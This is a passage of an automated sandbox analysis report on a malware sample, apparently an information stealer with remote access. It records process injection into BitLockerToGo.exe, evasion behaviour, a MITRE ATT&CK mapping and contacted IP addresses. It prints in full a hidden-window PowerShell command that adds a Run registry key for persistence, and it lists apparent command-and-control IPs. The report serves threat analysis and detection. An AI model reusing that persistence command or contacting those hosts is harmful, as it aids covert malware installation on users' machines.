      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAutomated click: OK
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: BwqqVoHR71.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: BwqqVoHR71.exeStatic file information: File size 19172088 > 1048576
      Source: BwqqVoHR71.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4dca00
      Source: BwqqVoHR71.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc87e00
      Source: BwqqVoHR71.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: BitLockerToGo.pdb source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: BitLockerToGo.pdbGCTL source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
      Source: BwqqVoHR71.exeStatic PE information: section name: .symtab

      Boot Survival

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2722Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6240Thread sleep count: 2722 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 800Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: BwqqVoHR71.exe, 00000000.00000002.1469508708.000000000189D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158529265.0000000003178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F9D008Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8CC000Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: B78000Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: BDB000Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: BDC000Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: C0A000Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000002.00000002.3158908569.000000000C008000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7660, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000002.00000002.3158908569.000000000C008000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7660, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Command and Scripting Interpreter
      11
      Registry Run Keys / Startup Folder
      311
      Process Injection
      1
      Masquerading
      21
      Input Capture
      1
      Security Software Discovery
      Remote Services21
      Input Capture
      1
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      1
      DLL Side-Loading
      11
      Registry Run Keys / Startup Folder
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      311
      Process Injection
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture1
      Proxy
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      BwqqVoHR71.exe29%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://aka.ms/pscore6lB0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://46.8.232.106/false
        unknown
        http://46.8.236.61/false
          unknown
          http://93.185.159.253/false
            unknown
            http://188.130.206.243/false
              unknown
              http://91.212.166.91/false
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1577671729.00000000045E1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://picsum.photos/208/500BwqqVoHR71.exefalse
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://46.8.232.106BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpfalse
                      unknown
                      http://188.130.206.243http://46.8.232.106BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmpfalse
                        unknown
                        https://picsum.photos/500/500%02x:%02x:%02x:%02x:%02x:%02xBwqqVoHR71.exefalse
                          unknown
